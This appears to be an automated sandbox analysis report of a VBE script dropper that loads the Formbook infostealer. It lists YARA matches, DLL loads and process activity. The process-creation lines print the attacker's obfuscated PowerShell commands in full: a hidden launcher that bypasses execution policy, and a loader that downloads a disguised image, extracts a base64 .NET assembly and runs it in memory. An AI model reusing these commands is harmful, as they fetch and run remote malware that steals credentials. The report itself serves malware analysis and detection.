Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330A352 5_2_0330A352
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323D34C 5_2_0323D34C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0329739A 5_2_0329739A
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325E3F0 5_2_0325E3F0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033103E6 5_2_033103E6
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F0274 5_2_032F0274
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032552A0 5_2_032552A0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032F12ED 5_2_032F12ED
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326B2C0 5_2_0326B2C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D02C0 5_2_032D02C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03240100 5_2_03240100
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032EA118 5_2_032EA118
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0328516C 5_2_0328516C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0323F172 5_2_0323F172
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0331B16B 5_2_0331B16B
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032D8158 5_2_032D8158
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0325B1B0 5_2_0325B1B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033101AA 5_2_033101AA
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033081CC 5_2_033081CC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330F0E0 5_2_0330F0E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033070E9 5_2_033070E9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032FF0CC 5_2_032FF0CC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032570C0 5_2_032570C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250770 5_2_03250770
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03274750 5_2_03274750
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330F7B0 5_2_0330F7B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0324C7C0 5_2_0324C7C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0326C6E0 5_2_0326C6E0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_033016CC 5_2_033016CC
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03250535 5_2_03250535
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03307571 5_2_03307571
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032ED5B0 5_2_032ED5B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03310591 5_2_03310591
Source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winVBE@12/6@7/5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0mfx1ro.0w2.ps1
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: dllhost.exe, 0000000B.00000003.2923701892.000000000341B000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3410035281.0000000003411000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2921298085.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2921298085.0000000003411000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3410035281.000000000343D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: 10092024150836 09.10.2024.vbe Virustotal: Detection: 7%
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Process created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"
Source: C:\Windows\SysWOW64\dllhost.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\dllhost.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3743-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Windows\SysWOW64\dllhost.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
